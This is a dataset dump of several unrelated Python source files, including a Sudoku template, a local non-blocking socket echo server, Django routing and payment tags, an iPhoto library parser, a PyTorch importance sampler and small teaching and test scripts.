Dataset columns:

| column | type | range / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3 to 616 |
| content_id | string | length 40 |
| detected_licenses | sequence | length 0 to 112 |
| license_type | string | 2 classes |
| repo_name | string | length 5 to 115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 to 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 to 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 to 2023-09-06 01:08:06 |
| github_id | int64, nullable | 4.92k to 681M |
| star_events_count | int64 | 0 to 209k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us], nullable | 2012-06-04 01:52:49 to 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us], nullable | 2008-05-22 07:58:19 to 2023-08-21 12:35:19 |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 to 10.2M |
| extension | string | 188 classes |
| content | string | length 3 to 10.2M |
| authors | sequence | length 1 |
| author_id | string | length 1 to 132 |
# === /hard/python3/c0006_37_sudoku-solver/00_leetcode_0006.py (repo: drunkwater/leetcode) ===
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#37. Sudoku Solver
#Write a program to solve a Sudoku puzzle by filling the empty cells.
#A sudoku solution must satisfy all of the following rules:
#Each of the digits 1-9 must occur exactly once in each row.
#Each of the digits 1-9 must occur exactly once in each column.
#Each of the digits 1-9 must occur exactly once in each of the 9 3x3 sub-boxes of the grid.
#Empty cells are indicated by the character '.'.
#A sudoku puzzle...
#...and its solution numbers marked in red.
#Note:
#The given board contains only digits 1-9 and the character '.'.
#You may assume that the given Sudoku puzzle will have a single unique solution.
#The given board size is always 9x9.
#class Solution:
# def solveSudoku(self, board):
# """
# :type board: List[List[str]]
# :rtype: void Do not return anything, modify board in-place instead.
# """
# Time Is Money
# === /days33/非阻塞模型/服务端.py (repo: 95Li/oldboy-learning-code) ===
from socket import *
import time
s=socket()
s.bind(('127.0.0.1',8080))  # the original bound '172.0.0.1', presumably a typo for the loopback address
s.listen(5)
s.setblocking(False)
r_list=[]
w_list=[]
while True:
try:
conn,addr=s.accept()
r_list.append(conn)
except BlockingIOError:
        print('ganhuo')  # pinyin for 干活: "doing work"
print('rlist',len(r_list))
        # read phase: try to receive from every accepted connection
        del_rlist=[]
for conn in r_list:
try:
date=conn.recv(1024)
w_list.append((conn,date.upper()))
except BlockingIOError :
continue
except ConnectionResetError:
del_rlist.append(conn)
        # write phase: send back the upper-cased data where sockets are ready
        del_wlist=[]
for item in w_list:
try :
conn=item[0]
date=item[1]
conn.send(date)
del_wlist.append(item)
except BlockingIOError :
continue
except ConnectionResetError:
del_wlist.append(item)
for conn in del_rlist:
r_list.remove(conn)
for item in del_wlist:
w_list.remove(item)
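# A matching blocking client, as an illustrative sketch (not part of the
# original repo; it would live in a separate script, e.g. 客户端.py, since
# the server loop above never returns):
#
#   from socket import *
#
#   c = socket()
#   c.connect(('127.0.0.1', 8080))
#   c.send('hello'.encode('utf-8'))      # server echoes the bytes upper-cased
#   print(c.recv(1024).decode('utf-8'))  # -> HELLO
#   c.close()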
# === /project/deluxenation/urls.py (repo: mmahnken/deluxenation) ===
"""project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.admin.views.decorators import staff_member_required
from django.conf.urls.static import static
import drawings.urls
import drawings.views
import settings
urlpatterns = [
url(r'^admin/nb/$', staff_member_required(drawings.views.NotebookCreateView.as_view(template_name='drawings/notebook_create.html'))),
url(r'^admin/bulk-add/drawings/$', staff_member_required(drawings.views.BulkDrawingCreateView.as_view(template_name='drawings/bulk-add.html'))),
url(r'^admin/', admin.site.urls),
url(r'^', include(drawings.urls)),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# === /paysto/templatetags/paysto_tags.py (repo: loobinsk/newprj) ===
#-*- coding: utf-8 -*-
from django import template
from paysto import PAYSTO_ONLINE_MERCHANT_NOCART_URL
from paysto.forms import PaymentForm
from django.conf import settings
from paysto.models import BasePayment
from django.utils.safestring import mark_safe
register = template.Library()
@register.inclusion_tag('paysto/payment-form.html', takes_context=True)
def payment_form(context, payment):
form = PaymentForm(data={
'PAYSTO_SHOP_ID': settings.PAYSTO_SHOP_ID,
'PAYSTO_SUM': payment.total,
'PAYSTO_INVOICE_ID': payment.id,
'PAYSTO_DESC': payment.description,
'PayerEmail': payment.user.email
})
return {
'form': form,
'action': PAYSTO_ONLINE_MERCHANT_NOCART_URL
}
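# Hypothetical template usage of the inclusion tag above (the `payment`
# context variable is an assumption, not from the original source):
#   {% load paysto_tags %}
#   {% payment_form payment %}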
@register.filter
def payment_status(status):
if status == BasePayment.STATUS_CONFIRMED:
return mark_safe('<span class="text-success">%s</span>' % BasePayment.STATUSES[status])
if status == BasePayment.STATUS_WAITING:
return mark_safe('<span class="text-muted">%s</span>' % BasePayment.STATUSES[status])
if status == BasePayment.STATUS_ERROR:
return mark_safe('<span class="text-danger">%s</span>' % BasePayment.STATUSES[status])
else:
try:
return mark_safe(BasePayment.STATUSES[status])
        except KeyError:  # unknown status code
return "" | [
"[email protected]"
] | |
a3a575bf96ed9e2f22999b912246dbf230f5d0c3 | 9b6db11ea5bf899625857078988e1d66fbd14212 | /iphoto2html/iphotodata.py | 232745a728d98e2f80b12129c43a3169feb85404 | [
"Apache-2.0"
] | permissive | mblondel/iphoto2html | d5757c8350470f36128b6633433b0667997c509f | 95c48847972d5d1c595f44fac6edbfaa72c9ac88 | refs/heads/master | 2020-05-31T17:27:31.323177 | 2014-05-11T05:42:27 | 2014-05-11T05:42:27 | 19,658,739 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,489 | py | '''iPhoto database: reads iPhoto database and parses it into albums and images.
@author: [email protected]
This class reads iPhoto image, event, album information from the file
AlbumData.xml in the iPhoto library directory. That file is written by iPhoto
for the media browser in other applications. All data are
organized in the class IPhotoData. Images in iPhoto are grouped using events
(formerly knows as rolls) and albums. Each image is in exactly one event, and
optionally, in zero or more albums. Albums can be nested (folders). The album
types are:
Flagged - flagged pictures
Folder - contains other albums
Published - an album published to MobileMe
Regular - a regular user created album
SelectedEventAlbum - most recent album (as shown in iPhoto)
Shelf - list of flagged images
Smart - a user created smart album
SpecialMonth - "Last Month"
SpecialRoll - "Last Import"
Event - this type does not exist in the XML file, but we use it in this code
to allow us to treat events just like any other album
Face - Face album (does not exist in iPhoto, only in this code).
None - should not really happen
'''
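# Typical usage, as a sketch (the functions are defined at the bottom of this
# module; the library path is an assumed example):
#
#   xml_file = get_album_xmlfile('/Users/me/Pictures/iPhoto Library')
#   data = get_iphoto_data(xml_file)
#   for roll in data.rolls:
#       print roll.tostring()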
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import os
import sys
import applexml
import imageutils
import systemutils as sysutils
def parse_face_rectangle(string_data):
"""Parse a rectangle specification into an array of coordinate data.
Args:
string_data: Rectangle like '{{x, y}, {width, height}}'
Returns:
Array of x, y, width and height as floats.
"""
try:
return [float(entry.strip('{} ')) for entry in string_data.split(',')]
except ValueError:
print >> sys.stderr, 'Failed to parse rectangle ' + string_data
return [ 0.4, 0.4, 0.2, 0.2 ]
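# Example: parse_face_rectangle('{{0.2, 0.3}, {0.1, 0.1}}') returns
# [0.2, 0.3, 0.1, 0.1].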
def _get_aperture_master_path(preview_path):
"""Given a path to a Aperture preview image, return the folder where the
Master would be stored if it is in the library."""
# Folder where preview image is stored.
folder = os.path.dirname(preview_path)
# Cut of the last folder in the path (see iphotodata_test.py for
# example).
folder = os.path.dirname(folder)
return folder.replace('/Previews/', '/Masters/', 1)
class IPhotoData(object):
"""top level iPhoto data node."""
def __init__(self, xml_data, is_aperture):
"""# call with results of readAppleXML."""
self.data = xml_data
self.aperture = is_aperture
self.albums = {}
self.face_albums = None
# Master map of keywords
self.keywords = self.data.get("List of Keywords")
self.face_names = {} # Master map of faces
face_list = self.data.get("List of Faces")
if face_list:
for face_entry in face_list.values():
face_key = face_entry.get("key")
face_name = face_entry.get("name")
self.face_names[face_key] = face_name
# Other keys in face_entry: image, key image face index,
# PhotoCount, Order
self.images_by_id = {}
image_data = self.data.get("Master Image List")
if image_data:
for key in image_data:
image = IPhotoImage(image_data.get(key), self.keywords,
self.face_names)
self.images_by_id[key] = image
album_data = self.data.get("List of Albums")
self.root_album = IPhotoContainer("", "Root", None, None)
for data in album_data:
album = IPhotoAlbum(data, self.images_by_id, self.albums,
self.root_album)
self.albums[album.albumid] = album
roll_data = self.data.get("List of Rolls")
self._rolls = {}
if roll_data:
for roll in roll_data:
roll = IPhotoRoll(roll, self.images_by_id)
self._rolls[roll.albumid] = roll
self.root_album.addalbum(roll)
self.images_by_base_name = None
self.images_by_file_name = None
def _build_image_name_list(self):
self.images_by_base_name = {}
self.images_by_file_name = {}
# build the basename map
for image in self.images_by_id.values():
base_name = image.getbasename()
other_images = self.images_by_base_name.get(base_name)
if other_images is None:
other_images = []
self.images_by_base_name[base_name] = other_images
other_images.append(image)
imagename = image.getimagename()
other_image_list = self.images_by_file_name.get(imagename)
if other_image_list is None:
other_image_list = []
self.images_by_file_name[imagename] = other_image_list
other_image_list.append(image)
def _getapplicationversion(self):
return self.data.get("Application Version")
applicationVersion = property(_getapplicationversion, doc='iPhoto version')
def _getimages(self):
return self.images_by_id.values()
images = property(_getimages, "List of images")
def _getrolls(self):
return self._rolls.values()
rolls = property(_getrolls, "List of rolls (events)")
def getroll(self, album_id):
return self._rolls.get(album_id)
def getbaseimages(self, base_name):
"""returns an IPhotoImage list of all images with a matching base name.
"""
if not self.images_by_base_name:
self._build_image_name_list()
return self.images_by_base_name.get(base_name)
def getnamedimage(self, file_name):
"""returns an IPhotoImage for the given file name."""
if not self.images_by_file_name:
self._build_image_name_list()
image_list = self.images_by_file_name.get(file_name)
if image_list:
return image_list[0]
return None
def getallimages(self):
"""returns map from full path name to image."""
image_map = {}
for image in self.images_by_id.values():
image_map[image.getimagepath()] = image
image_map[image.thumbpath] = image
if image.originalpath is not None:
image_map[image.originalpath] = image
return image_map
def checkalbumsizes(self, max_size):
"""Prints a message for any event or album that has too many images."""
messages = []
for album in self._rolls.values():
if album.size > max_size:
messages.append("%s: event too large (%d)" % (album.name,
album.size))
for album in self.albums.values():
if album.albumtype == "Regular" and album.size > max_size:
messages.append("%s: album too large (%d)" % (album.name,
album.size))
messages.sort()
for message in messages:
print message
def load_aperture_originals(self):
"""Attempts to locate the original image files (Masters). Only works if
the masters are stored in the library."""
if not self.aperture:
return
for image in self.images_by_id.values():
image.find_aperture_original()
# public void checkComments() {
# TreeSet<String> images = new TreeSet<String>();
# for (IPhotoImage image : images_by_id.values()) {
# String comment = image.GetComment();
# if ((comment == null or comment.length() == 0) && !image.IsHidden())
# images.add(image.caption);
# }
# for (String caption : images)
# System.out.println(caption + ": missing comment.");
# }
def check_inalbums(self):
"""Checks that all images are in albums according to their events."""
messages = []
for image in self.images_by_id.values():
if image.IsHidden():
continue
roll_name = self._rolls[image.roll].name
albums = []
in_album = False
for album in image.GetAlbums():
album_name = album.name
if album.GetAlbumType == "Regular":
albums.append(album.name)
in_album = True
if album_name != roll_name:
messages.append(image.caption + ": in wrong album (" +
roll_name + " vs. " + album_name + ").")
elif (album.isSmart() and album_name.endswith(" Collection") or
album_name == "People" or album_name == "Unorganized"):
in_album = True
if not in_album:
messages.append(image.caption + ": not in any album.")
if albums:
messages.append(image.caption + ": in more than one album: " +
" ".join(albums))
messages.sort()
for message in messages:
print message
def getfacealbums(self):
"""Returns a map of albums for faces."""
if self.face_albums:
return self.face_albums.values()
# Build the albums on first call
self.face_albums = {}
for image in self.images:
for face in image.getfaces():
face_album = self.face_albums.get(face)
if not face_album:
face_album = IPhotoFace(face)
self.face_albums[face] = face_album
face_album.addimage(image)
return self.face_albums.values()
class IPhotoImage(object):
"""Describes an image in the iPhoto database."""
def __init__(self, data, keyword_map, face_map):
self.data = data
self._caption = sysutils.nn_string(data.get("Caption")).strip()
self.comment = sysutils.nn_string(data.get("Comment")).strip()
if data.has_key("DateAsTimerInterval"):
self.date = applexml.getappletime(data.get("DateAsTimerInterval"))
else:
self.date = None
self.mod_date = applexml.getappletime(
data.get("ModDateAsTimerInterval"))
self.image_path = data.get("ImagePath")
if data.has_key("Rating"):
self.rating = int(data.get("Rating"))
else:
self.rating = None
if data.get("longitude"):
latitude = float(data.get("latitude"))
longitude = float(data.get("longitude"))
self.gps = imageutils.GpsLocation(latitude, longitude)
else:
self.gps = None
self.keywords = []
keyword_list = data.get("Keywords")
if keyword_list is not None:
for i in keyword_list:
self.keywords.append(keyword_map.get(i))
self.originalpath = data.get("OriginalPath")
self.roll = data.get("Roll")
self.albums = [] # list of albums that this image belongs to
self.faces = []
self.face_rectangles = []
self.event_name = '' # name of event (roll) that this image belongs to
self.event_index = '' # index within event
self.event_index0 = '' # index with event, left padded with 0
face_list = data.get("Faces")
if face_list:
for face_entry in face_list:
face_key = face_entry.get("face key")
face_name = face_map.get(face_key)
if face_name:
self.faces.append(face_name)
# Rectangle is '{{x, y}, {width, height}}' as ratios,
# referencing the lower left corner of the face rectangle.
self.face_rectangles.append(parse_face_rectangle(
face_entry.get("rectangle")))
# Other keys in face_entry: face index
def getimagepath(self):
"""Returns the full path to this image.."""
return self.image_path
def getimagename(self):
"""Returns the file name of this image.."""
name = os.path.split(self.image_path)[1]
return name
def getbasename(self):
"""Returns the base name of the main image file."""
return sysutils.getfilebasename(self.image_path)
def _getcaption(self):
if not self._caption:
return self.getimagename()
return self._caption
caption = property(_getcaption, doc="Caption (title) of the image")
def ismovie(self):
"""Tests if this image is a movie."""
return self.data.get("MediaType") == "Movie"
def addalbum(self, album):
"""Adds an album to the list of albums for this image."""
self.albums.append(album)
def addface(self, name):
"""Adds a face (name) to the list of faces for this image."""
self.faces.append(name)
def getfaces(self):
"""Gets the list of face tags for this image."""
return self.faces
def ishidden(self):
"""Tests if the image is hidden (using keyword "Hidden")"""
return "Hidden" in self.keywords
def _getthumbpath(self):
return self.data.get("ThumbPath")
thumbpath = property(_getthumbpath, doc="Path to thumbnail image")
def _getrotationisonlyedit(self):
return self.data.get("RotationIsOnlyEdit")
rotation_is_only_edit = property(_getrotationisonlyedit,
doc="Rotation is only edit.")
def _search_for_file(self, folder_path, basename):
"""Scans recursively through a folder tree and returns the path to the
first file it finds that starts with "basename".
"""
for file_name in os.listdir(folder_path):
path = os.path.join(folder_path, file_name)
if os.path.isdir(path):
path = self._search_for_file(path, basename)
if path:
return path
elif file_name.startswith(basename):
return path
return None
def find_aperture_original(self):
"""Attempts to locate the Aperture Master image. Works only for .jpg
masters that are stored in the Aperture library. Saves the result as
originalpath."""
master_path = _get_aperture_master_path(self.image_path)
if not os.path.exists(master_path):
return
basename = sysutils.getfilebasename(self.image_path)
file_name = os.path.join(master_path, basename + '.jpg')
if os.path.exists(file_name):
self.originalpath = file_name
return
path = self._search_for_file(master_path, basename + '.')
if path:
self.originalpath = path
return
print "No master for " + self.image_path
class IPhotoContainer(object):
"""Base class for IPhotoAlbum and IPhotoRoll."""
def __init__(self, name, albumtype, data, images):
self.name = name
self.date = None
# The iPhoto master album has no album type.
if not albumtype and name == 'Photos':
albumtype = 'Master'
# Convert Aperture numeric album types to iPhoto album type names.
if albumtype == '1':
albumtype = 'Regular'
elif albumtype == '2':
albumtype = 'Smart'
elif albumtype == '3':
albumtype = 'Special'
elif albumtype == '4':
albumtype = 'Event'
elif albumtype == '5':
albumtype = 'Library'
elif albumtype == '6':
albumtype = 'Folder'
elif albumtype == '18':
albumtype = 'OnlineAccount'
elif albumtype == '20':
albumtype = 'Published'
elif not albumtype:
print 'No album type for %s.' % name
elif albumtype.isdigit():
albumid = int(albumtype)
if albumid > 90:
# 94 - Photos
# 95 - Flagged
# 96 - Library Album
# 97 - Projects
# 98 - Aperture
# 99 - Aperture Library
albumtype = name
else:
print 'Unknown album type %s for %s.' % (albumtype, name)
self.albumtype = albumtype
self.data = data
self.albumid = -1
self.images = []
self.albums = []
self.master = False
if not self.isfolder() and data and data.has_key("KeyList"):
keylist = data.get("KeyList")
for key in keylist:
image = images.get(key)
if image:
self.images.append(image)
else:
print "%s: image with id %s does not exist." % (name, key)
def _getcomment(self):
return self.data.get("Comments")
comment = property(_getcomment, doc='comments (description)')
def _getsize(self):
return len(self.images)
size = property(_getsize, "Gets the size (# of images) of this album.")
def isfolder(self):
"""tests if this album is a folder."""
return "Folder" == self.albumtype
def getfolderhint(self):
"""Gets a suggested folder name from comments."""
if self.comment:
for comment in self.comment.split("\n"):
if comment.startswith("@"):
return comment[1:]
return None
def getcommentwithouthints(self):
"""Gets the image comments, with any folder hint lines removed"""
result = []
if self.comment:
for line in self.comment.split("\n"):
if not line.startswith("@"):
result.append(line)
return "\n".join(result)
def addalbum(self, album):
"""adds an album to this container."""
self.albums.append(album)
def find_oldest_date(self):
# For containers that don't have a date, we calculate it from the image
# dates.
if self.date:
return
self.date = datetime.datetime.now()
for image in self.images:
if image.date and image.date < self.date:
self.date = image.date
def tostring(self):
"""Gets a string that describes this album or event."""
return "%s (%s)" % (self.name, self.albumtype)
def ishidden(self):
return all([img.ishidden() for img in self.images])
class IPhotoRoll(IPhotoContainer):
"""Describes an iPhoto Roll or Event."""
def __init__(self, data, images):
IPhotoContainer.__init__(self,
data.get("RollName")
if data.has_key("RollName")
else data.get("AlbumName"),
"Event", data, images)
self.albumid = data.get("RollID")
if not self.albumid:
self.albumid = data.get("AlbumId")
self.date = applexml.getappletime(self.data.get(
"RollDateAsTimerInterval"))
if not self.date:
self.date = applexml.getappletime(self.data.get(
'ProjectEarliestDateAsTimerInterval'))
i = 1
index_digits = len(str(len(self.images)))
for image in self.images:
image.event_name = self.name
image.event_index = i
image.event_index0 = str(i).zfill(index_digits)
i += 1
class IPhotoAlbum(IPhotoContainer):
"""Describes an iPhoto Album."""
def __init__(self, data, images, album_map, root_album):
IPhotoContainer.__init__(self, data.get("AlbumName"),
data.get("Album Type"),
data, images)
self.albumid = data.get("AlbumId")
if data.has_key("Master"):
self.master = True
parent_id = data.get("Parent")
if parent_id is None:
self.parent = root_album
else:
self.parent = album_map.get(parent_id)
if not self.parent:
print "Album %s: parent with id %d not found." % (
self.name, parent_id)
if self.parent:
self.parent.addalbum(self)
self.find_oldest_date()
class IPhotoFace(object):
"""An IPhotoContainer compatible class for a face."""
def __init__(self, face):
self.name = face
self.albumtype = "Face"
self.albumid = -1
self.images = []
self.albums = []
self.comment = ""
self.date = datetime.datetime.now()
def _getsize(self):
return len(self.images)
size = property(_getsize, "Gets the size (# of images) of this album.")
def isfolder(self):
"""tests if this album is a folder."""
return False
def getfolderhint(self):
"""Gets a suggested folder name from comments."""
return None
def getcommentwithouthints(self):
"""Gets the image comments, with any folder hint lines removed"""
return ""
def addimage(self, image):
"""Adds an image to this container."""
self.images.append(image)
        # Set the face date based on the earliest image.
if image.date and image.date < self.date:
self.date = image.date
def tostring(self):
"""Gets a string that describes this album or event."""
return "%s (%s)" % (self.name, self.albumtype)
def get_album_xmlfile(library_dir):
"""Locates the iPhoto AlbumData.xml or Aperture ApertureData.xml file."""
if os.path.exists(library_dir) and os.path.isdir(library_dir):
album_xml_file = os.path.join(library_dir, "AlbumData.xml")
if os.path.exists(album_xml_file):
return album_xml_file
album_xml_file = os.path.join(library_dir, "ApertureData.xml")
if os.path.exists(album_xml_file):
return album_xml_file
raise ValueError, ("%s does not appear to be a valid iPhoto or Aperture "
"library location.") % (library_dir)
def get_iphoto_data(album_xml_file):
"""reads the iPhoto database and converts it into an iPhotoData object."""
library_dir = os.path.dirname(album_xml_file)
print "Reading iPhoto database from " + library_dir + "..."
album_xml = applexml.read_applexml(album_xml_file)
data = IPhotoData(album_xml, album_xml_file.endswith('ApertureData.xml'))
if data.aperture:
if not data.applicationVersion.startswith('3.'):
raise ValueError, "Aperture version %s not supported" % (
data.applicationVersion)
else:
if (not data.applicationVersion.startswith("9.") and
not data.applicationVersion.startswith("8.") and
not data.applicationVersion.startswith("7.") and
not data.applicationVersion.startswith("6.")):
raise ValueError, "iPhoto version %s not supported" % (
data.applicationVersion)
return data
# === /apps/team/migrations/0002_auto_20150904_1835.py (repo: ImgBotApp/manutd.org.np) ===
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('team', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='player',
name='address',
),
migrations.RemoveField(
model_name='player',
name='date_of_birth',
),
migrations.RemoveField(
model_name='player',
name='name',
),
migrations.RemoveField(
model_name='player',
name='phone',
),
migrations.RemoveField(
model_name='staff',
name='address',
),
migrations.RemoveField(
model_name='staff',
name='date_of_birth',
),
migrations.RemoveField(
model_name='staff',
name='name',
),
migrations.RemoveField(
model_name='staff',
name='phone',
),
migrations.AddField(
model_name='player',
name='user',
field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AddField(
model_name='staff',
name='user',
field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
# === /data/datasets/resampling/adaptive/importance_sampler.py (repo: khoehlein/fV-SRN-Ensemble-Compression, license: MIT) ===
import argparse
from typing import Optional
import torch
from matplotlib import pyplot as plt
from common.mathparser import BigInteger
from inference import IFieldEvaluator
from data.datasets.resampling.coordinate_box import CoordinateBox, UnitCube
from data.datasets.resampling.adaptive.density_tree_sampler import FastDensityTreeSampler
from data.datasets.resampling.adaptive.density_tree import FastDensityTree
from data.datasets.resampling.adaptive.statistical_tests import (
FastKolmogorovSmirnovTestNd,
FastWhiteHomoscedasticityTest,
)
from data.datasets.resampling import IImportanceSampler
from data.datasets.sampling import ISampler, RandomUniformSampler
class DensityTreeImportanceSampler(IImportanceSampler):
@staticmethod
def init_parser(parser: argparse.ArgumentParser):
group = parser.add_argument_group('DensityTreeImportanceSampler')
prefix = '--importance-sampler:tree:'
group.add_argument(prefix + 'min-depth', type=int, default=4, help="""
minimum tree depth for adaptive loss grid
""")
group.add_argument(prefix + 'max-depth', type=int, default=12, help="""
maximum tree depth for adaptive loss grid
""")
group.add_argument(prefix + 'num-samples-per-node', type=int, default=128, help="""
number of samples per node for loss tree refinement
""")
group.add_argument(prefix + 'alpha', type=float, default=0.05, help="""
significance threshold for splitting decision
""")
group.add_argument(prefix + 'batch-size', type=BigInteger, default=None, help="""
batch size for loss evaluation during importance sampling (Default: Dataset batch size)
""")
group.add_argument(prefix + 'min-density', type=float, default=0.01, help="""
minimum probability density for sampling per grid box
""")
group.add_argument(prefix + 'max-ratio', type=float, default=10, help="""
maximum ratio of probability densities during node splitting
""")
# group.add_argument(prefix + 'seed', type=int, default=42, help="""
# seed for importance sampling random number generator
# """)
@staticmethod
def read_args(args: dict):
prefix = 'importance_sampler:tree:'
return {
key: args[prefix + key]
for key in ['min_depth', 'max_depth', 'num_samples_per_node', 'batch_size',
'min_density', 'max_ratio', 'alpha']
}
@classmethod
def from_dict(cls, args, dimension=None, device=None):
sampler_kws = DensityTreeImportanceSampler.read_args(args)
return DensityTreeImportanceSampler(**sampler_kws, dimension=dimension, device=device)
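    # Illustrative wiring of the argparse helpers above (not in the original
    # file):
    #   parser = argparse.ArgumentParser()
    #   DensityTreeImportanceSampler.init_parser(parser)
    #   args = vars(parser.parse_args())
    #   sampler = DensityTreeImportanceSampler.from_dict(
    #       args, dimension=3, device=torch.device('cuda:0'))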
def __init__(
self,
sampler: Optional[ISampler] = None, dimension:Optional[int] = None, batch_size=None,
min_depth=4, max_depth=8, num_samples_per_node=128, min_density=0.01, max_ratio=10,
alpha=0.05, root_box: Optional[CoordinateBox] = None, device=None, dtype=None, seed=None
):
if dimension is None and sampler is not None:
dimension = sampler.dimension
if dimension is None and root_box is not None:
dimension = root_box.dimension
assert dimension is not None
if sampler is not None:
assert dimension == sampler.dimension
if device is not None:
assert device == sampler.device
if dtype is not None:
assert dtype == sampler.dtype
device = sampler.device
dtype = sampler.dtype
else:
assert device is not None
sampler = RandomUniformSampler(dimension, device=device, dtype=dtype)
if root_box is not None:
assert dimension == root_box.dimension
assert device == root_box.device
else:
root_box = UnitCube(dimension, device=device, dtype=dtype)
super(DensityTreeImportanceSampler, self).__init__(dimension, root_box, device)
self.dimension = dimension
self.sampler = sampler
self.root_box = root_box
self.min_depth = min_depth
self.max_depth = max_depth
self.num_samples_per_node = num_samples_per_node
self.min_density = min_density
self.max_ratio = max_ratio
self.alpha = alpha
assert batch_size is not None
self.batch_size = int(batch_size)
self.dtype = dtype
self.device = device
def generate_samples(self, num_samples: int, evaluator: IFieldEvaluator, **kwargs):
with torch.no_grad():
difference_test = FastKolmogorovSmirnovTestNd(alpha=self.alpha)
homoscedasticity_test = FastWhiteHomoscedasticityTest(alpha=self.alpha)
tree = FastDensityTree.from_scalar_field(
self.root_box, self.sampler, evaluator, difference_test, homoscedasticity_test=homoscedasticity_test,
min_depth=self.min_depth,max_depth=self.max_depth, num_samples_per_node=self.num_samples_per_node,
store_sample_summary=True, num_samples_per_batch=self.batch_size,
device=self.device
)
tree.add_summaries()
sampler = FastDensityTreeSampler(
self.sampler, tree,
min_density=self.min_density, max_ratio=self.max_ratio
)
samples, weights = sampler.generate_samples(num_samples)
if samples.device != self.device:
samples = samples.to(self.device)
weights = weights.to(self.device)
perm = torch.randperm(num_samples, device=torch.device('cpu'))
samples = samples[perm]
weights = weights[perm]
return samples, weights
def _test_sampler():
import torch
from torch import Tensor
class Evaluator(IFieldEvaluator):
def __init__(self, dimension, device=None):
super(Evaluator, self).__init__(dimension, 1, device)
self.direction = 4 * torch.tensor([1] * dimension, device=device)[None, :]# torch.randn(1, dimension, device=device)
self.offset = torch.tensor([0.5] * dimension, device=device)[None, :] # torch.randn(1, dimension, device=device)
def forward(self, positions: Tensor) -> Tensor:
return torch.sum(self.direction * (positions - self.offset), dim=-1) ** 2
device = torch.device('cuda:0')
evaluator = Evaluator(3, device=device)
sampler = DensityTreeImportanceSampler(
dimension=3, device=device, batch_size=64**3,
max_ratio=3,
min_density=0.1
)
for i in range(20):
samples = sampler.generate_samples(4000, evaluator)
c = evaluator.evaluate(samples)
samples = samples.data.cpu().numpy()
c = c[:, 0].data.cpu().numpy()
fig = plt.figure()
ax = fig.add_subplot(projection='3d')
ax.scatter(samples[:, 0], samples[:, 1], samples[:, 2], c=c)
plt.show()
plt.close()
if __name__ == '__main__':
    _test_sampler()

# === /gen_yield_for.py (repo: Hemanthtm2/learning.python) ===
#!/usr/bin/python
def print_squares(start,end):
for x in range(start,end):
yield x**2
for n in print_squares(2,5):
print(n)
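# prints 4, 9, 16: the squares of 2, 3 and 4 (range(2, 5) excludes 5)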
# === /cases/pa3/sample/str_cat-151.py (repo: Virtlink/ccbench-chocopy) ===
a:str = "Hello"
b:str = "World"
c:str = "ChocoPy"
def cat2(a:str, b:str) -> str:
return a + b
def cat3(a:str, b:str, c:str) -> str:
return a + b + c
print(cat2(a, b))
print(cat2("", c))
print(cat3(a, " ", c))
print(len(a))  # original read "$ID(len(a))", an apparent placeholder for print
print(len(cat2(a,a)))
print(len(cat2("","")))
# === /PhysFit/P2VV/scripts/makeTaggingPlots.py (repo: pseyfert-cern-gitlab-backup/Urania) ===
# script parameters
plotsFilePath = 'plots/Reco14/20112012Reco14_tagging.pdf'
dataSetFilePath = '/project/bfys/jleerdam/data/Bs2Jpsiphi/Reco14/P2VVDataSets20112012Reco14_I2Mass_6KKMassBins_2TagCats_HLT2B_20140619.root'
fullDataSetName = 'JpsiKK'
sigDataSetName = 'JpsiKK_sigSWeight'
cbkgDataSetName = 'JpsiKK_cbkgSWeight'
numEstWTagBins = 50
# workspace
from P2VV.RooFitWrappers import RooObject
ws = RooObject(workspace = 'JpsiphiWorkspace').ws()
# read data sets
from P2VV.Utilities.DataHandling import readData
fullData = readData( filePath = dataSetFilePath, dataSetName = fullDataSetName, NTuple = False )
sigData = readData( filePath = dataSetFilePath, dataSetName = sigDataSetName, NTuple = False )
cbkgData = readData( filePath = dataSetFilePath, dataSetName = cbkgDataSetName, NTuple = False )
# get observables
from P2VV.RooFitWrappers import RealVar, Category
estWTagOS = RealVar('tagomega_os_cb')
estWTagSS = RealVar('tagomega_ss_nn')
tagCatOS = Category('tagCatP2VVOS')
tagCatSS = Category('tagCatP2VVSS')
# build PDFs for estimated wrong-tag probabilities
taggedDataOS = sigData.reduce( '%s > 0' % tagCatOS.GetName() )
taggedDataSS = sigData.reduce( '%s > 0' % tagCatSS.GetName() )
